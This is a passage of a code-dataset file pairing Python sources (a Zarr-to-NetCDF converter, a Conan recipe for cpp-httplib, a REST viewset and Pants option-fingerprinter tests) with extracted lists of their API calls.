'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (5069, 5093), False, 'import unittest\n'), ((5115, 5157), 'fattureincloud_python_sdk.model.list_cost_centers_response.ListCostCentersResponse', 'ListCostCentersResponse', ([], {'data': "['to', 'mi']"}), "(data=['to', 'mi'])\n", (5138, 5157), False, 'from fattureincloud_python_sdk.model.list_cost_centers_response import ListCostCentersResponse\n'), ((5534, 5576), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (5557, 5576), False, 'import unittest\n'), ((5610, 5652), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (5633, 5652), False, 'import unittest\n'), ((5702, 5749), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (5725, 5749), False, 'import unittest\n'), ((5771, 5820), 'fattureincloud_python_sdk.model.list_countries_response.ListCountriesResponse', 'ListCountriesResponse', ([], {'data': "['Spagna', 'Albania']"}), "(data=['Spagna', 'Albania'])\n", (5792, 5820), False, 'from fattureincloud_python_sdk.model.list_countries_response import ListCountriesResponse\n'), ((6378, 6420), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (6401, 6420), False, 'import unittest\n'), ((6454, 6496), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (6477, 6496), False, 'import unittest\n'), ((6546, 6593), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (6569, 6593), False, 'import unittest\n'), ((7273, 7315), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (7296, 7315), False, 'import unittest\n'), ((7349, 7391), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (7372, 7391), False, 'import unittest\n'), ((7441, 7488), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (7464, 7488), False, 'import unittest\n'), ((7992, 8034), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8015, 8034), False, 'import unittest\n'), ((8068, 8110), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8091, 8110), False, 'import unittest\n'), ((8160, 8207), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (8183, 8207), False, 'import unittest\n'), ((8229, 8297), 'fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response.ListDeliveryNotesDefaultCausalsResponse', 'ListDeliveryNotesDefaultCausalsResponse', ([], {'data': "['causal3', 'causal2']"}), "(data=['causal3', 'causal2'])\n", (8268, 8297), False, 'from fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response import ListDeliveryNotesDefaultCausalsResponse\n'), ((8710, 8752), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8733, 8752), False, 'import unittest\n'), ((8786, 8828), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8809, 8828), False, 'import unittest\n'), ((8878, 8925), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (8901, 8925), False, 'import unittest\n'), ((9481, 9523), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (9504, 9523), False, 'import unittest\n'), ((9557, 9599), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (9580, 9599), False, 'import unittest\n'), ((9649, 9696), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (9672, 9696), False, 'import unittest\n'), ((10750, 10792), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10773, 10792), False, 'import unittest\n'), ((10826, 10868), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10849, 10868), False, 'import unittest\n'), ((10918, 10965), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (10941, 10965), False, 'import unittest\n'), ((11926, 11968), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11949, 11968), False, 'import unittest\n'), ((12002, 12044), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12025, 12044), False, 'import unittest\n'), ((12094, 12141), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (12117, 12141), False, 'import unittest\n'), ((12163, 12215), 'fattureincloud_python_sdk.model.list_product_categories_response.ListProductCategoriesResponse', 'ListProductCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (12192, 12215), False, 'from fattureincloud_python_sdk.model.list_product_categories_response import ListProductCategoriesResponse\n'), ((12627, 12669), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12650, 12669), False, 'import unittest\n'), ((12703, 12745), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12726, 12745), False, 'import unittest\n'), ((12795, 12842), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (12818, 12842), False, 'import unittest\n'), ((12864, 12925), 'fattureincloud_python_sdk.model.list_received_document_categories_response.ListReceivedDocumentCategoriesResponse', 'ListReceivedDocumentCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (12902, 12925), False, 'from fattureincloud_python_sdk.model.list_received_document_categories_response import ListReceivedDocumentCategoriesResponse\n'), ((13318, 13360), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13341, 13360), False, 'import unittest\n'), ((13394, 13436), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13417, 13436), False, 'import unittest\n'), ((13486, 13533), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (13509, 13533), False, 'import unittest\n'), ((13555, 13600), 'fattureincloud_python_sdk.model.list_revenue_centers_response.ListRevenueCentersResponse', 'ListRevenueCentersResponse', ([], {'data': "['to', 'mi']"}), "(data=['to', 'mi'])\n", (13581, 13600), False, 'from fattureincloud_python_sdk.model.list_revenue_centers_response import ListRevenueCentersResponse\n'), ((14013, 14055), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14036, 14055), False, 'import unittest\n'), ((14089, 14131), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14112, 14131), False, 'import unittest\n'), ((14181, 14228), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (14204, 14228), False, 'import unittest\n'), ((14687, 14729), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14710, 14729), False, 'import unittest\n'), ((14763, 14805), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14786, 14805), False, 'import unittest\n'), ((14855, 14902), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (14878, 14902), False, 'import unittest\n'), ((14924, 14969), 'fattureincloud_python_sdk.model.list_units_of_measure_response.ListUnitsOfMeasureResponse', 'ListUnitsOfMeasureResponse', ([], {'data': "['kb', 'km']"}), "(data=['kb', 'km'])\n", (14950, 14969), False, 'from fattureincloud_python_sdk.model.list_units_of_measure_response import ListUnitsOfMeasureResponse\n'), ((15565, 15607), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15588, 15607), False, 'import unittest\n'), ((15641, 15683), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15664, 15683), False, 'import unittest\n'), ((15733, 15780), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (15756, 15780), False, 'import unittest\n'), ((3418, 3444), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (3438, 3444), False, 'import functions\n'), ((4133, 4159), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (4153, 4159), False, 'import functions\n'), ((4820, 4846), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (4840, 4846), False, 'import functions\n'), ((5476, 5502), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (5496, 5502), False, 'import functions\n'), ((6320, 6346), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (6340, 6346), False, 'import functions\n'), ((7215, 7241), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (7235, 7241), False, 'import functions\n'), ((7934, 7960), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (7954, 7960), False, 'import functions\n'), ((8652, 8678), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (8672, 8678), False, 'import functions\n'), ((9423, 9449), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (9443, 9449), False, 'import functions\n'), ((10692, 10718), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (10712, 10718), False, 'import functions\n'), ((11868, 11894), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (11888, 11894), False, 'import functions\n'), ((12569, 12595), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (12589, 12595), False, 'import functions\n'), ((13260, 13286), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (13280, 13286), False, 'import functions\n'), ((13955, 13981), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (13975, 13981), False, 'import functions\n'), ((14629, 14655), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (14649, 14655), False, 'import functions\n'), ((15507, 15533), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (15527, 15533), False, 'import functions\n'), ((4455, 4506), 'fattureincloud_python_sdk.model.city.City', 'City', ([], {'postal_code': '"""24121"""', 'city': '"""BG"""', 'province': '"""BG"""'}), "(postal_code='24121', city='BG', province='BG')\n", (4459, 4506), False, 'from fattureincloud_python_sdk.model.city import City\n'), ((6653, 6750), 'fattureincloud_python_sdk.model.detailed_country.DetailedCountry', 'DetailedCountry', ([], {'name': '"""Italia"""', 'settings_name': '"""Italia"""', 'iso': '"""IT"""', 'fiscal_iso': '"""IT"""', 'uic': '"""086"""'}), "(name='Italia', settings_name='Italia', iso='IT', fiscal_iso\n ='IT', uic='086')\n", (6668, 6750), False, 'from fattureincloud_python_sdk.model.detailed_country import DetailedCountry\n'), ((6749, 6847), 'fattureincloud_python_sdk.model.detailed_country.DetailedCountry', 'DetailedCountry', ([], {'name': '"""Albania"""', 'settings_name': '"""Albania"""', 'iso': '"""AL"""', 'fiscal_iso': '"""AL"""', 'uic': '"""087"""'}), "(name='Albania', settings_name='Albania', iso='AL',\n fiscal_iso='AL', uic='087')\n", (6764, 6847), False, 'from fattureincloud_python_sdk.model.detailed_country import DetailedCountry\n'), ((7541, 7590), 'fattureincloud_python_sdk.model.currency.Currency', 'Currency', ([], {'id': '"""USD"""', 'symbol': '"""e"""', 'exchange_rate': '"""1"""'}), "(id='USD', symbol='e', exchange_rate='1')\n", (7549, 7590), False, 'from fattureincloud_python_sdk.model.currency import Currency\n'), ((8977, 9014), 'fattureincloud_python_sdk.model.language.Language', 'Language', ([], {'code': '"""ITA"""', 'name': '"""Italiano"""'}), "(code='ITA', name='Italiano')\n", (8985, 9014), False, 'from fattureincloud_python_sdk.model.language import Language\n'), ((14280, 14343), 'fattureincloud_python_sdk.model.document_template.DocumentTemplate', 'DocumentTemplate', ([], {'id': '(2)', 'name': '"""Light Smoke"""', 'type': '"""type_example"""'}), "(id=2, name='Light Smoke', type='type_example')\n", (14296, 14343), False, 'from fattureincloud_python_sdk.model.document_template import DocumentTemplate\n'), ((15831, 16062), 'fattureincloud_python_sdk.model.vat_type.VatType', 'VatType', ([], {'id': '(2)', 'value': '(22.0)', 'description': '"""Non imponibile art. 123"""', 'notes': '"""IVA non imponibile ai sensi dell articolo 123, comma 2"""', 'e_invoice': '(True)', 'ei_type': '"""2"""', 'ei_description': '"""ei_description_example"""', 'is_disabled': '(True)'}), "(id=2, value=22.0, description='Non imponibile art. 123', notes=\n 'IVA non imponibile ai sensi dell articolo 123, comma 2', e_invoice=\n True, ei_type='2', ei_description='ei_description_example', is_disabled\n =True)\n", (15838, 16062), False, 'from fattureincloud_python_sdk.model.vat_type import VatType\n'), ((9796, 9826), 'fattureincloud_python_sdk.model.payment_account_type.PaymentAccountType', 'PaymentAccountType', (['"""standard"""'], {}), "('standard')\n", (9814, 9826), False, 'from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType\n'), ((11069, 11098), 'fattureincloud_python_sdk.model.payment_method_type.PaymentMethodType', 'PaymentMethodType', (['"""standard"""'], {}), "('standard')\n", (11086, 11098), False, 'from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType\n'), ((11301, 11379), 'fattureincloud_python_sdk.model.payment_method_details.PaymentMethodDetails', 'PaymentMethodDetails', ([], {'title': '"""title_example"""', 'description': '"""description_example"""'}), "(title='title_example', description='description_example')\n", (11321, 11379), False, 'from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails\n'), ((11183, 11213), 'fattureincloud_python_sdk.model.payment_account_type.PaymentAccountType', 'PaymentAccountType', (['"""standard"""'], {}), "('standard')\n", (11201, 11213), False, 'from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType\n')] |
"""
Script to convert Zarr store to the NetCDF format file.
Usage:
python zarr_to_netcdf.py -i ZarrStoreName -o NetCDFFileName
Convert Zarr data stored in ZarrStoreName to the NetCDF file NetCDFFileName.
"""
import argparse
import timeit
import warnings
import xarray as xr
from itscube_types import Coords, DataVars
if __name__ == '__main__':
warnings.filterwarnings('ignore')
# Command-line arguments parser
parser = argparse.ArgumentParser(epilog='\n'.join(__doc__.split('\n')[1:]),
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-i', '--input', type=str, required=True,
help="Input Zarr store directory.")
parser.add_argument('-o', '--output', type=str, required=True,
help="NetCDF filename to store data to.")
parser.add_argument('-e', '--engine', type=str, required=False, default='h5netcdf',
help="NetCDF engine to use to store NetCDF data to the file.")
args = parser.parse_args()
start_time = timeit.default_timer()
# Don't decode time delta's as it does some internal conversion based on
# provided units
ds_zarr = xr.open_zarr(args.input, decode_timedelta=False)
# print(f"mid_date: {ds_zarr.mid_date}")
# print(f"x: {ds_zarr.x.attrs}")
# print(f"y: {ds_zarr.y.attrs}")
# This is just a work around for coordinates attributes not being written
# to the Zarr store (submit xarray ticket?)
ds_zarr.mid_date.attrs = {
DataVars.STD_NAME: Coords.STD_NAME[Coords.MID_DATE],
DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.MID_DATE]
}
ds_zarr.x.attrs = {
DataVars.STD_NAME: Coords.STD_NAME[Coords.X],
DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.X]
}
ds_zarr.y.attrs = {
DataVars.STD_NAME: Coords.STD_NAME[Coords.Y],
DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.Y]
}
time_delta = timeit.default_timer() - start_time
print(f"Read Zarr {args.input} (took {time_delta} seconds)")
compression = {"zlib": True, "complevel": 2, "shuffle": True}
encoding = {}
encoding = {
'map_scale_corrected': {'_FillValue': 0.0, 'dtype': 'byte'},
'interp_mask': {'_FillValue': 0.0, 'dtype': 'ubyte'},
'flag_stable_shift': {'dtype': 'long'},
'chip_size_height': {'_FillValue': 0.0, 'dtype': 'ushort'},
'chip_size_width': {'_FillValue': 0.0, 'dtype': 'ushort'},
'v_error': {'_FillValue': -32767.0, 'dtype': 'short'},
'v': {'_FillValue': -32767.0, 'dtype': 'short'},
'vx': {'_FillValue': -32767.0, 'dtype': 'short'},
'vx_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'vx_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'vy': {'_FillValue': -32767.0, 'dtype': 'short'},
'vy_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'vy_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'va': {'_FillValue': -32767.0, 'dtype': 'short'},
'va_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'va_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'vr': {'_FillValue': -32767.0, 'dtype': 'short'},
'vr_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'vr_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'vxp': {'_FillValue': -32767.0, 'dtype': 'short'},
'vxp_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'vxp_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'vyp': {'_FillValue': -32767.0, 'dtype': 'short'},
'vyp_error': {'_FillValue': -32767.0, 'dtype': 'double'},
'vyp_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
'vp': {'_FillValue': -32767.0, 'dtype': 'short'},
'vp_error': {'_FillValue': -32767.0, 'dtype': 'short'},
'acquisition_img1': {'units': 'days since 1970-01-01'},
'acquisition_img2': {'units': 'days since 1970-01-01'},
'date_center': {'_FillValue': None, 'units': 'days since 1970-01-01'},
'mid_date': {'_FillValue': None, 'units': 'days since 1970-01-01'},
'autoRIFT_software_version': {'_FillValue': None},
'stable_count': {'_FillValue': None},
'date_dt': {'_FillValue': None},
'x': {'_FillValue': None},
'y': {'_FillValue': None}
}
encode_data_vars = (
'v',
'v_error',
'map_scale_corrected',
'vx',
'vx_error',
'vx_stable_shift',
'flag_stable_shift',
'vy',
'vy_error',
'vy_stable_shift',
'chip_size_height',
'chip_size_width',
'interp_mask',
'va',
'va_error',
'va_stable_shift',
'vp',
'vp_error',
'vr',
'vr_error',
'vr_stable_shift',
'vxp',
'vxp_error',
'vxp_stable_shift',
'vyp',
'vyp_error',
'vyp_stable_shift',
'mission_img1',
'sensor_img1',
'satellite_img1',
'acquisition_img1',
'mission_img2',
'sensor_img2',
'satellite_img2',
'acquisition_img2',
'date_dt',
'date_center',
'roi_valid_percentage',
'autoRIFT_software_version'
)
# Set up compression for each of the data variables
for each in encode_data_vars:
encoding.setdefault(each, {}).update(compression)
start_time = timeit.default_timer()
ds_zarr.to_netcdf(
args.output,
engine=args.engine,
encoding = encoding
)
time_delta = timeit.default_timer() - start_time
print(f"Wrote dataset to NetCDF file {args.output} (took {time_delta} seconds)")
| [
"timeit.default_timer",
"xarray.open_zarr",
"warnings.filterwarnings"
] | [((354, 387), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (377, 387), False, 'import warnings\n'), ((1080, 1102), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1100, 1102), False, 'import timeit\n'), ((1215, 1263), 'xarray.open_zarr', 'xr.open_zarr', (['args.input'], {'decode_timedelta': '(False)'}), '(args.input, decode_timedelta=False)\n', (1227, 1263), True, 'import xarray as xr\n'), ((5861, 5883), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5881, 5883), False, 'import timeit\n'), ((1993, 2015), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (2013, 2015), False, 'import timeit\n'), ((6007, 6029), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (6027, 6029), False, 'import timeit\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
import os
class CppHttpLibConan(ConanFile):
name = "cpp-httplib"
version = "0.2.1"
url = "https://github.com/zinnion/conan-cpp-httplib"
description = "A single file C++11 header-only HTTP/HTTPS server and client library"
license = "MIT"
no_copy_source = True
build_policy = "always"
requires = "OpenSSL/1.1.1d@zinnion/stable", "zlib/1.2.11@zinnion/stable"
def source(self):
source_url = "https://github.com/maurodelazeri/cpp-httplib"
tools.get("{0}/archive/v{1}.tar.gz".format(source_url, self.version))
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, "sources")
def package_id(self):
self.info.header_only()
def package(self):
self.copy(pattern="LICENSE")
self.copy(pattern="*.h", dst="include", keep_path=False)
| [
"os.rename"
] | [((711, 746), 'os.rename', 'os.rename', (['extracted_dir', '"""sources"""'], {}), "(extracted_dir, 'sources')\n", (720, 746), False, 'import os\n')] |
from rest_framework.viewsets import ReadOnlyModelViewSet
from backmarker.api.serializers.driver_serializer import DriverSerializer
from backmarker.models.driver import Driver
class DriverViewSet(ReadOnlyModelViewSet):
queryset = Driver.objects.all()
serializer_class = DriverSerializer
lookup_field = "reference"
| [
"backmarker.models.driver.Driver.objects.all"
] | [((236, 256), 'backmarker.models.driver.Driver.objects.all', 'Driver.objects.all', ([], {}), '()\n', (254, 256), False, 'from backmarker.models.driver import Driver\n')] |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
import pytest
from pants.option.custom_types import (
DictValueComponent,
ListValueComponent,
UnsetBool,
dict_with_files_option,
dir_option,
file_option,
)
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner()
def test_fingerprint_dict() -> None:
d1 = {"b": 1, "a": 2}
d2 = {"a": 2, "b": 1}
d3 = {"a": 1, "b": 2}
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(DictValueComponent.create, d) for d in (d1, d2, d3)
)
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_dict_with_non_string_keys() -> None:
d = {("a", 2): (3, 4)}
fp = OptionsFingerprinter().fingerprint(DictValueComponent.create, d)
assert fp == "3852a094612ce1c22c08ee2ddcdc03d09e87ad97"
def test_fingerprint_list() -> None:
l1 = [1, 2, 3]
l2 = [1, 3, 2]
fp1, fp2 = (OptionsFingerprinter().fingerprint(ListValueComponent.create, l) for l in (l1, l2))
assert fp1 != fp2
def test_fingerprint_file(rule_runner: RuleRunner) -> None:
fp1, fp2, fp3 = (
OptionsFingerprinter().fingerprint(file_option, rule_runner.write_files({f: c})[0])
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
assert fp1 != fp2
assert fp1 != fp3
assert fp2 != fp3
def test_fingerprint_file_outside_buildroot(tmp_path: Path, rule_runner: RuleRunner) -> None:
outside_buildroot = rule_runner.write_files({(tmp_path / "foobar").as_posix(): "foobar"})[0]
with pytest.raises(ValueError):
OptionsFingerprinter().fingerprint(file_option, outside_buildroot)
def test_fingerprint_file_list(rule_runner: RuleRunner) -> None:
f1, f2, f3 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
fp1 = OptionsFingerprinter().fingerprint(file_option, [f1, f2])
fp2 = OptionsFingerprinter().fingerprint(file_option, [f2, f1])
fp3 = OptionsFingerprinter().fingerprint(file_option, [f1, f3])
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_primitive() -> None:
fp1, fp2 = (OptionsFingerprinter().fingerprint("", v) for v in ("foo", 5))
assert fp1 != fp2
def test_fingerprint_unset_bool() -> None:
fp1 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
fp2 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
assert fp1 == fp2
def test_fingerprint_dir(rule_runner: RuleRunner) -> None:
d1 = rule_runner.create_dir("a")
d2 = rule_runner.create_dir("b")
d3 = rule_runner.create_dir("c")
rule_runner.write_files(
{
"a/bar/bar.config": "blah blah blah",
"a/foo/foo.config": "meow meow meow",
"b/foo/foo.config": "meow meow meow",
"b/bar/bar.config": "blah blah blah",
"c/bar/bar.config": "blah meow blah",
}
)
dp1 = OptionsFingerprinter().fingerprint(dir_option, [d1])
dp2 = OptionsFingerprinter().fingerprint(dir_option, [d1, d2])
dp3 = OptionsFingerprinter().fingerprint(dir_option, [d2, d1])
dp4 = OptionsFingerprinter().fingerprint(dir_option, [d3])
assert dp1 == dp1
assert dp2 == dp2
assert dp1 != dp3
assert dp1 != dp4
assert dp2 != dp3
def test_fingerprint_dict_with_files_order(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f2},{f1}"})
assert fp1 == fp2
def test_fingerprint_dict_with_file_content_change(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
with open(f1, "w") as f:
f.write("123")
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
assert fp1 != fp2
| [
"pytest.raises",
"pants.testutil.rule_runner.RuleRunner",
"pants.option.options_fingerprinter.OptionsFingerprinter"
] | [((519, 531), 'pants.testutil.rule_runner.RuleRunner', 'RuleRunner', ([], {}), '()\n', (529, 531), False, 'from pants.testutil.rule_runner import RuleRunner\n'), ((1871, 1896), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1884, 1896), False, 'import pytest\n'), ((912, 934), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (932, 934), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2303, 2325), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2323, 2325), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2371, 2393), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2391, 2393), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2439, 2461), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2459, 2461), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2741, 2763), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2761, 2763), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((2808, 2830), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (2828, 2830), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3376, 3398), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3396, 3398), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3439, 3461), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3459, 3461), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3506, 3528), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3526, 3528), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((3573, 3595), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (3593, 3595), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4024, 4046), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4044, 4046), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4123, 4145), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4143, 4145), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), ((4530, 4552), 'pants.option.options_fingerprinter.OptionsFingerprinter', 'OptionsFingerprinter', ([], {}), '()\n', (4550, 4552), False, 'from pants.option.options_fingerprinter import OptionsFingerprinter\n'), 